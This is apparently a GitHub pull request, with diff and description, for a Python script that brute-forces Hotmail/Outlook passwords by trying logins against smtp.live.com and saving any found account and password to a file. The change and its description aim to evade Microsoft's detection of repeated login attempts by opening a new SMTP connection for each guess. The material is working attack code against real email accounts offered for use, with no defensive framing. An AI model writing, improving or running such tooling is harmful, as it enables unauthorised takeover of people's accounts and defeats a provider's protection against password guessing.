### PR TITLE
Bypass the brute force's attack detector to Hotmail

### DIFF
--- a/Brute_Force.py
+++ b/Brute_Force.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python3
+#!/usr/bin/python
 # -*- coding: utf-8 -*-
 import smtplib
 import threading
@@ -213,9 +213,6 @@ if options.gmail == None  :
                     print(use.usage)
                     exit()       
     elif options.hotmail != None or options.gmail == None:
-#        smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
-#        smtp_srverH.ehlo()
-#        smtp_srverH.starttls()
         if options.password != None or options.list_password == None  :
             print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s"%(R,W))
             try :

--- a/Brute_Force.py
+++ b/Brute_Force.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
 import smtplib
 import threading
@@ -213,12 +213,15 @@ if options.gmail == None  :
                     print(use.usage)
                     exit()       
     elif options.hotmail != None or options.gmail == None:
-        smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
-        smtp_srverH.ehlo()
-        smtp_srverH.starttls()
+#        smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
+#        smtp_srverH.ehlo()
+#        smtp_srverH.starttls()
         if options.password != None or options.list_password == None  :
             print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s"%(R,W))
             try :
+                smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
+                smtp_srverH.ehlo()
+                smtp_srverH.starttls()
                 smtp_srverH.login(options.hotmail,options.password)
                 print("Found Password :{} \t Found Hotmail:{}".format(options.password,options.hotmail))
                 Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+options.password+"\n")
@@ -229,6 +232,9 @@ if options.gmail == None  :
             for password in password_list:    
                 try :
                     print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s"%(R,W))
+                    smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
+                    smtp_srverH.ehlo()
+                    smtp_srverH.starttls()
                     smtp_srverH.login(options.hotmail,password)
                     print("FOUND Password :{} \n Found Hotmail:{}".format(password,options.hotmail))
                     Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+password+"\n")


### PR DESCRIPTION
Hi, I have added the permissions of executing in the `Brute_Force.py` file [chmod a+x], and I have moved the Hotmail connection's lines, inside of the exception. Because Microsoft Outlook when it detects many logins attempts in one same connection (smtplib.SMTP), it closes that connection. Therefore this script wouldn't work.

Consequently, the brute force's attack to account Hotmail would slower.